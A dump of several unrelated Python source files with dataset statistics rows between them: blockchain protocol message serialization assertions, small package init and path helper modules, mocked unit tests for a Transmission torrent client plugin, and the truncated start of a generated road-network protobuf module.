assert bytes(message) == bytes(request_signed_values)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(farming_info).from_bytes(message_bytes)
assert message == farming_info
assert bytes(message) == bytes(farming_info)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(signed_values).from_bytes(message_bytes)
assert message == signed_values
assert bytes(message) == bytes(signed_values)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_peak).from_bytes(message_bytes)
assert message == new_peak
assert bytes(message) == bytes(new_peak)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_transaction).from_bytes(message_bytes)
assert message == new_transaction
assert bytes(message) == bytes(new_transaction)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_transaction).from_bytes(message_bytes)
assert message == request_transaction
assert bytes(message) == bytes(request_transaction)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_transaction).from_bytes(message_bytes)
assert message == respond_transaction
assert bytes(message) == bytes(respond_transaction)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_proof_of_weight).from_bytes(message_bytes)
assert message == request_proof_of_weight
assert bytes(message) == bytes(request_proof_of_weight)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_proof_of_weight).from_bytes(message_bytes)
assert message == respond_proof_of_weight
assert bytes(message) == bytes(respond_proof_of_weight)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_block).from_bytes(message_bytes)
assert message == request_block
assert bytes(message) == bytes(request_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_block).from_bytes(message_bytes)
assert message == reject_block
assert bytes(message) == bytes(reject_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_blocks).from_bytes(message_bytes)
assert message == request_blocks
assert bytes(message) == bytes(request_blocks)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_blocks).from_bytes(message_bytes)
assert message == respond_blocks
assert bytes(message) == bytes(respond_blocks)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_blocks).from_bytes(message_bytes)
assert message == reject_blocks
assert bytes(message) == bytes(reject_blocks)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_block).from_bytes(message_bytes)
assert message == respond_block
assert bytes(message) == bytes(respond_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_unfinished_block).from_bytes(message_bytes)
assert message == new_unfinished_block
assert bytes(message) == bytes(new_unfinished_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_unfinished_block).from_bytes(message_bytes)
assert message == request_unfinished_block
assert bytes(message) == bytes(request_unfinished_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_unfinished_block).from_bytes(message_bytes)
assert message == respond_unfinished_block
assert bytes(message) == bytes(respond_unfinished_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_signage_point_or_end_of_subslot).from_bytes(message_bytes)
assert message == new_signage_point_or_end_of_subslot
assert bytes(message) == bytes(new_signage_point_or_end_of_subslot)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_signage_point_or_end_of_subslot).from_bytes(message_bytes)
assert message == request_signage_point_or_end_of_subslot
assert bytes(message) == bytes(request_signage_point_or_end_of_subslot)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_signage_point).from_bytes(message_bytes)
assert message == respond_signage_point
assert bytes(message) == bytes(respond_signage_point)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_end_of_subslot).from_bytes(message_bytes)
assert message == respond_end_of_subslot
assert bytes(message) == bytes(respond_end_of_subslot)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_mempool_transaction).from_bytes(message_bytes)
assert message == request_mempool_transaction
assert bytes(message) == bytes(request_mempool_transaction)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_compact_vdf).from_bytes(message_bytes)
assert message == new_compact_vdf
assert bytes(message) == bytes(new_compact_vdf)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_compact_vdf).from_bytes(message_bytes)
assert message == request_compact_vdf
assert bytes(message) == bytes(request_compact_vdf)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_compact_vdf).from_bytes(message_bytes)
assert message == respond_compact_vdf
assert bytes(message) == bytes(respond_compact_vdf)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_peers).from_bytes(message_bytes)
assert message == request_peers
assert bytes(message) == bytes(request_peers)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_peers).from_bytes(message_bytes)
assert message == respond_peers
assert bytes(message) == bytes(respond_peers)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_puzzle_solution).from_bytes(message_bytes)
assert message == request_puzzle_solution
assert bytes(message) == bytes(request_puzzle_solution)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(puzzle_solution_response).from_bytes(message_bytes)
assert message == puzzle_solution_response
assert bytes(message) == bytes(puzzle_solution_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_puzzle_solution).from_bytes(message_bytes)
assert message == respond_puzzle_solution
assert bytes(message) == bytes(respond_puzzle_solution)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_puzzle_solution).from_bytes(message_bytes)
assert message == reject_puzzle_solution
assert bytes(message) == bytes(reject_puzzle_solution)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(send_transaction).from_bytes(message_bytes)
assert message == send_transaction
assert bytes(message) == bytes(send_transaction)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(transaction_ack).from_bytes(message_bytes)
assert message == transaction_ack
assert bytes(message) == bytes(transaction_ack)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_peak_wallet).from_bytes(message_bytes)
assert message == new_peak_wallet
assert bytes(message) == bytes(new_peak_wallet)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_block_header).from_bytes(message_bytes)
assert message == request_block_header
assert bytes(message) == bytes(request_block_header)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_header_block).from_bytes(message_bytes)
assert message == respond_header_block
assert bytes(message) == bytes(respond_header_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_header_request).from_bytes(message_bytes)
assert message == reject_header_request
assert bytes(message) == bytes(reject_header_request)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_removals).from_bytes(message_bytes)
assert message == request_removals
assert bytes(message) == bytes(request_removals)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_removals).from_bytes(message_bytes)
assert message == respond_removals
assert bytes(message) == bytes(respond_removals)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_removals_request).from_bytes(message_bytes)
assert message == reject_removals_request
assert bytes(message) == bytes(reject_removals_request)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_additions).from_bytes(message_bytes)
assert message == request_additions
assert bytes(message) == bytes(request_additions)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_additions).from_bytes(message_bytes)
assert message == respond_additions
assert bytes(message) == bytes(respond_additions)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_additions).from_bytes(message_bytes)
assert message == reject_additions
assert bytes(message) == bytes(reject_additions)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_header_blocks).from_bytes(message_bytes)
assert message == request_header_blocks
assert bytes(message) == bytes(request_header_blocks)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_header_blocks).from_bytes(message_bytes)
assert message == reject_header_blocks
assert bytes(message) == bytes(reject_header_blocks)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_header_blocks).from_bytes(message_bytes)
assert message == respond_header_blocks
assert bytes(message) == bytes(respond_header_blocks)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(coin_state).from_bytes(message_bytes)
assert message == coin_state
assert bytes(message) == bytes(coin_state)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(register_for_ph_updates).from_bytes(message_bytes)
assert message == register_for_ph_updates
assert bytes(message) == bytes(register_for_ph_updates)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_to_ph_updates).from_bytes(message_bytes)
assert message == respond_to_ph_updates
assert bytes(message) == bytes(respond_to_ph_updates)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(register_for_coin_updates).from_bytes(message_bytes)
assert message == register_for_coin_updates
assert bytes(message) == bytes(register_for_coin_updates)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_to_coin_updates).from_bytes(message_bytes)
assert message == respond_to_coin_updates
assert bytes(message) == bytes(respond_to_coin_updates)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(coin_state_update).from_bytes(message_bytes)
assert message == coin_state_update
assert bytes(message) == bytes(coin_state_update)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_children).from_bytes(message_bytes)
assert message == request_children
assert bytes(message) == bytes(request_children)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_children).from_bytes(message_bytes)
assert message == respond_children
assert bytes(message) == bytes(respond_children)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_ses_info).from_bytes(message_bytes)
assert message == request_ses_info
assert bytes(message) == bytes(request_ses_info)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_ses_info).from_bytes(message_bytes)
assert message == respond_ses_info
assert bytes(message) == bytes(respond_ses_info)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(pool_difficulty).from_bytes(message_bytes)
assert message == pool_difficulty
assert bytes(message) == bytes(pool_difficulty)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(harvester_handhsake).from_bytes(message_bytes)
assert message == harvester_handhsake
assert bytes(message) == bytes(harvester_handhsake)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_signage_point_harvester).from_bytes(message_bytes)
assert message == new_signage_point_harvester
assert bytes(message) == bytes(new_signage_point_harvester)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_proof_of_space).from_bytes(message_bytes)
assert message == new_proof_of_space
assert bytes(message) == bytes(new_proof_of_space)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_signatures).from_bytes(message_bytes)
assert message == request_signatures
assert bytes(message) == bytes(request_signatures)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_signatures).from_bytes(message_bytes)
assert message == respond_signatures
assert bytes(message) == bytes(respond_signatures)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(plot).from_bytes(message_bytes)
assert message == plot
assert bytes(message) == bytes(plot)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_plots).from_bytes(message_bytes)
assert message == request_plots
assert bytes(message) == bytes(request_plots)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_plots).from_bytes(message_bytes)
assert message == respond_plots
assert bytes(message) == bytes(respond_plots)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_peers_introducer).from_bytes(message_bytes)
assert message == request_peers_introducer
assert bytes(message) == bytes(request_peers_introducer)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_peers_introducer).from_bytes(message_bytes)
assert message == respond_peers_introducer
assert bytes(message) == bytes(respond_peers_introducer)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(authentication_payload).from_bytes(message_bytes)
assert message == authentication_payload
assert bytes(message) == bytes(authentication_payload)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(get_pool_info_response).from_bytes(message_bytes)
assert message == get_pool_info_response
assert bytes(message) == bytes(get_pool_info_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(post_partial_payload).from_bytes(message_bytes)
assert message == post_partial_payload
assert bytes(message) == bytes(post_partial_payload)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(post_partial_request).from_bytes(message_bytes)
assert message == post_partial_request
assert bytes(message) == bytes(post_partial_request)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(post_partial_response).from_bytes(message_bytes)
assert message == post_partial_response
assert bytes(message) == bytes(post_partial_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(get_farmer_response).from_bytes(message_bytes)
assert message == get_farmer_response
assert bytes(message) == bytes(get_farmer_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(post_farmer_payload).from_bytes(message_bytes)
assert message == post_farmer_payload
assert bytes(message) == bytes(post_farmer_payload)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(post_farmer_request).from_bytes(message_bytes)
assert message == post_farmer_request
assert bytes(message) == bytes(post_farmer_request)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(post_farmer_response).from_bytes(message_bytes)
assert message == post_farmer_response
assert bytes(message) == bytes(post_farmer_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(put_farmer_payload).from_bytes(message_bytes)
assert message == put_farmer_payload
assert bytes(message) == bytes(put_farmer_payload)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(put_farmer_request).from_bytes(message_bytes)
assert message == put_farmer_request
assert bytes(message) == bytes(put_farmer_request)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(put_farmer_response).from_bytes(message_bytes)
assert message == put_farmer_response
assert bytes(message) == bytes(put_farmer_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(error_response).from_bytes(message_bytes)
assert message == error_response
assert bytes(message) == bytes(error_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_peak_timelord).from_bytes(message_bytes)
assert message == new_peak_timelord
assert bytes(message) == bytes(new_peak_timelord)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_unfinished_block_timelord).from_bytes(message_bytes)
assert message == new_unfinished_block_timelord
assert bytes(message) == bytes(new_unfinished_block_timelord)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_infusion_point_vdf).from_bytes(message_bytes)
assert message == new_infusion_point_vdf
assert bytes(message) == bytes(new_infusion_point_vdf)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_signage_point_vdf).from_bytes(message_bytes)
assert message == new_signage_point_vdf
assert bytes(message) == bytes(new_signage_point_vdf)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_end_of_sub_slot_bundle).from_bytes(message_bytes)
assert message == new_end_of_sub_slot_bundle
assert bytes(message) == bytes(new_end_of_sub_slot_bundle)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_compact_proof_of_time).from_bytes(message_bytes)
assert message == request_compact_proof_of_time
assert bytes(message) == bytes(request_compact_proof_of_time)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_compact_proof_of_time).from_bytes(message_bytes)
assert message == respond_compact_proof_of_time
assert bytes(message) == bytes(respond_compact_proof_of_time)
assert input_bytes == b""
| 43.606695 | 85 | 0.774276 | 2,710 | 20,844 | 5.549816 | 0.042435 | 0.217021 | 0.203457 | 0.134574 | 0.924601 | 0.872141 | 0.742487 | 0.639029 | 0.478657 | 0.429588 | 0 | 0.000168 | 0.144502 | 20,844 | 477 | 86 | 43.698113 | 0.843259 | 0.003358 | 0 | 0.238095 | 1 | 0 | 0.000241 | 0 | 0 | 0 | 0 | 0 | 0.481481 | 1 | 0.005291 | false | 0 | 0.013228 | 0 | 0.021164 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
beb750ca5eeba275eb34244f4468d4b6b8be6f9a | 180 | py | Python | gym_linzhank/envs/__init__.py | linZHank/gym-coop | 3e032537e4a4923725be13715bc9d2aa029e63d0 | [
"MIT"
] | null | null | null | gym_linzhank/envs/__init__.py | linZHank/gym-coop | 3e032537e4a4923725be13715bc9d2aa029e63d0 | [
"MIT"
] | null | null | null | gym_linzhank/envs/__init__.py | linZHank/gym-coop | 3e032537e4a4923725be13715bc9d2aa029e63d0 | [
"MIT"
] | null | null | null | from gym_linzhank.envs.solo_escaper_env import SoloEscaperEnv
from gym_linzhank.envs.tri_puller_env import TriPullerEnv
from gym_linzhank.envs.duo_carrier_env import DuoCarrierEnv
| 45 | 61 | 0.9 | 27 | 180 | 5.666667 | 0.555556 | 0.137255 | 0.294118 | 0.372549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 180 | 3 | 62 | 60 | 0.910714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fe97fc1814fd4321e4e316858164606f64bbdbdf | 99 | py | Python | tests/utils.py | pyfaddist/faddist.assembler | 732ffef55c98394003b56e8dab3b7217b6496127 | [
"MIT"
] | null | null | null | tests/utils.py | pyfaddist/faddist.assembler | 732ffef55c98394003b56e8dab3b7217b6496127 | [
"MIT"
] | null | null | null | tests/utils.py | pyfaddist/faddist.assembler | 732ffef55c98394003b56e8dab3b7217b6496127 | [
"MIT"
] | null | null | null | import os
def absolute_path_to(*args):
return os.path.join(os.path.dirname(__file__), *args)
| 16.5 | 57 | 0.727273 | 16 | 99 | 4.125 | 0.6875 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131313 | 99 | 5 | 58 | 19.8 | 0.767442 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
227d5b38ea509265f883b531c5f9d389344174a4 | 9,873 | py | Python | tests/plugins/clients/test_transmission_plugin.py | riefas/torrent | 915f7c584f72e0183d2baa7708249cca39fae40d | [
"WTFPL"
] | null | null | null | tests/plugins/clients/test_transmission_plugin.py | riefas/torrent | 915f7c584f72e0183d2baa7708249cca39fae40d | [
"WTFPL"
] | null | null | null | tests/plugins/clients/test_transmission_plugin.py | riefas/torrent | 915f7c584f72e0183d2baa7708249cca39fae40d | [
"WTFPL"
] | null | null | null | import base64
from collections import namedtuple
from datetime import datetime
from mock import patch, Mock
from ddt import ddt
import transmissionrpc
from tests import DbTestCase
from monitorrent.plugins.clients import TopicSettings
from monitorrent.plugins.clients.transmission import TransmissionClientPlugin
import pytz
import pytz.reference
@ddt
class TransmissionPluginTest(DbTestCase):
def test_settings(self):
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
self.assertIsNone(plugin.get_settings())
plugin.set_settings(settings)
readed_settings = plugin.get_settings()
expected = {'host': 'localhost', 'port': TransmissionClientPlugin.DEFAULT_PORT, 'username': 'monitorrent'}
self.assertEqual(expected, readed_settings)
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_check_connection_successfull(self, transmission_client):
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
self.assertNotEqual(False, plugin.check_connection())
transmission_client.assert_called_with(address='localhost', port=TransmissionClientPlugin.DEFAULT_PORT,
user='monitorrent', password='monitorrent')
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_check_connection_without_credentials(self, transmission_client):
plugin = TransmissionClientPlugin()
self.assertFalse(plugin.check_connection())
transmission_client.assert_not_called()
transmission_client.assert_not_called()
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_check_connection_connect_exception(self, transmission_client):
transmission_client.side_effect = transmissionrpc.TransmissionError
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
self.assertFalse(plugin.check_connection())
transmission_client.assert_called_with(address='localhost', port=TransmissionClientPlugin.DEFAULT_PORT,
user='monitorrent', password='monitorrent')
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_find_torrent(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
date_added = datetime(2015, 10, 9, 12, 3, 55, tzinfo=pytz.reference.LocalTimezone())
torrent_hash = 'SomeRandomHashMockString'
torrent_class = namedtuple('Torrent', ['name', 'date_added'])
rpc_client.get_torrent.return_value = torrent_class(name='Torrent 1', date_added=date_added)
torrent = plugin.find_torrent(torrent_hash)
self.assertEqual({'name': 'Torrent 1', 'date_added': date_added.astimezone(pytz.utc)}, torrent)
rpc_client.get_torrent.assert_called_once_with(torrent_hash.lower(),
['id', 'hashString', 'addedDate', 'name'])
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_find_torrent_without_credentials(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
torrent_hash = 'SomeRandomHashMockString'
self.assertFalse(plugin.find_torrent(torrent_hash))
rpc_client.get_torrent.assert_not_called()
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_find_torrent_get_torrent_exception(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
torrent_hash = 'SomeRandomHashMockString'
rpc_client.get_torrent.side_effect = KeyError
self.assertFalse(plugin.find_torrent(torrent_hash))
rpc_client.get_torrent.assert_called_once_with(torrent_hash.lower(),
['id', 'hashString', 'addedDate', 'name'])
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_add_torrent(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
torrent = b'!torrent.content'
self.assertTrue(plugin.add_torrent(torrent, None))
rpc_client.add_torrent.assert_called_once_with(base64.b64encode(torrent).decode('utf-8'))
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_add_torrent_with_settings(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
torrent = b'!torrent.content'
self.assertTrue(plugin.add_torrent(torrent, TopicSettings('/path/to/download/dir')))
rpc_client.add_torrent.assert_called_once_with(base64.b64encode(torrent).decode('utf-8'), download_dir='/path/to/download/dir')
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_add_torrent_without_credentials(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
rpc_client.call.return_value = True
torrent = b'!torrent.content'
self.assertFalse(plugin.add_torrent(torrent, None))
rpc_client.add_torrent.assert_not_called()
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_add_torrent_add_torrent_exception(self, transmission_client):
rpc_client = transmission_client.return_value
rpc_client.add_torrent.side_effect = transmissionrpc.TransmissionError
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
torrent = b'!torrent.content'
self.assertFalse(plugin.add_torrent(torrent, None))
rpc_client.add_torrent.assert_called_once_with(base64.b64encode(torrent).decode('utf-8'))
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_remove_torrent(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
torrent_hash = 'SomeRandomHashMockString'
self.assertTrue(plugin.remove_torrent(torrent_hash))
rpc_client.remove_torrent.assert_called_once_with(torrent_hash.lower(), delete_data=False)
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_remove_torrent_without_credentials(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
torrent_hash = 'SomeRandomHashMockString'
self.assertFalse(plugin.remove_torrent(torrent_hash))
rpc_client.remove_torrent.assert_not_called()
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_remove_torrent_remove_torrent_exception(self, transmission_client):
rpc_client = transmission_client.return_value
rpc_client.remove_torrent.side_effect = transmissionrpc.TransmissionError
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
torrent_hash = 'SomeRandomHashMockString'
self.assertFalse(plugin.remove_torrent(torrent_hash))
rpc_client.remove_torrent.assert_called_once_with(torrent_hash.lower(), delete_data=False)
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_get_download_dir_success(self, transmission_client):
rpc_client = transmission_client.return_value
rpc_client.get_session.return_value = transmissionrpc.Session(fields={'download_dir': '/mnt/media/downloads'})
plugin = TransmissionClientPlugin()
assert plugin.get_download_dir() is None
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
assert plugin.get_download_dir() == u'/mnt/media/downloads'
rpc_client.get_session.assert_called_once()
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_get_download_dir_exception(self, transmission_client):
rpc_client = transmission_client.return_value
rpc_client.get_session.side_effect = transmissionrpc.TransmissionError
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
assert plugin.get_download_dir() is None
rpc_client.get_session.assert_called_once()
| 43.302632 | 135 | 0.72359 | 979 | 9,873 | 7.028601 | 0.114402 | 0.083709 | 0.061764 | 0.086034 | 0.837524 | 0.809185 | 0.809185 | 0.78477 | 0.774451 | 0.761517 | 0 | 0.003802 | 0.174213 | 9,873 | 227 | 136 | 43.493392 | 0.840182 | 0 | 0 | 0.656051 | 0 | 0 | 0.210169 | 0.114555 | 0 | 0 | 0 | 0 | 0.216561 | 1 | 0.101911 | false | 0.089172 | 0.070064 | 0 | 0.178344 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
a3b99f5f5f8b79064dc837e66ede02e694e19754 | 193,319 | py | Python | l5kit/l5kit/data/proto/road_network_pb2.py | stefaniespeichert/l5kit | e7ef272b80d71c5080891b27f478c6d3e001774e | [
"Apache-2.0"
] | null | null | null | l5kit/l5kit/data/proto/road_network_pb2.py | stefaniespeichert/l5kit | e7ef272b80d71c5080891b27f478c6d3e001774e | [
"Apache-2.0"
] | null | null | null | l5kit/l5kit/data/proto/road_network_pb2.py | stefaniespeichert/l5kit | e7ef272b80d71c5080891b27f478c6d3e001774e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: road_network.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import descriptor_pb2 as google_dot_protobuf_dot_descriptor__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='road_network.proto',
package='pb.lyft.maps',
syntax='proto3',
serialized_options=b'Z\004maps',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x12road_network.proto\x12\x0cpb.lyft.maps\x1a google/protobuf/descriptor.proto\x1a\x1bgoogle/protobuf/empty.proto\"\x16\n\x08GlobalId\x12\n\n\x02id\x18\x01 \x01(\x0c\"P\n\x0bGeoLocation\x12\x0e\n\x06lat_e7\x18\x01 \x01(\x0f\x12\x0e\n\x06lng_e7\x18\x02 \x01(\x0f\x12\x15\n\x0b\x61ltitude_cm\x18\x03 \x01(\x11H\x00\x42\n\n\x08\x41ltitude\"N\n\x08GeoFrame\x12)\n\x06origin\x18\x01 \x01(\x0b\x32\x19.pb.lyft.maps.GeoLocation\x12\x17\n\x0f\x62\x65\x61ring_degrees\x18\x02 \x01(\x02\"7\n\x0fLocalizedString\x12\x15\n\rlanguage_code\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t\"\xa8\x01\n\x0fRoadNetworkNode\x12+\n\x08location\x18\x01 \x01(\x0b\x32\x19.pb.lyft.maps.GeoLocation\x12-\n\rroad_segments\x18\x02 \x03(\x0b\x32\x16.pb.lyft.maps.GlobalId\x12\x0f\n\x07z_level\x18\x03 \x01(\x11\x12(\n\x08junction\x18\x04 \x01(\x0b\x32\x16.pb.lyft.maps.GlobalId\"\xaa\x01\n\x11\x41\x63\x63\x65ssRestriction\x12\x32\n\x04type\x18\x01 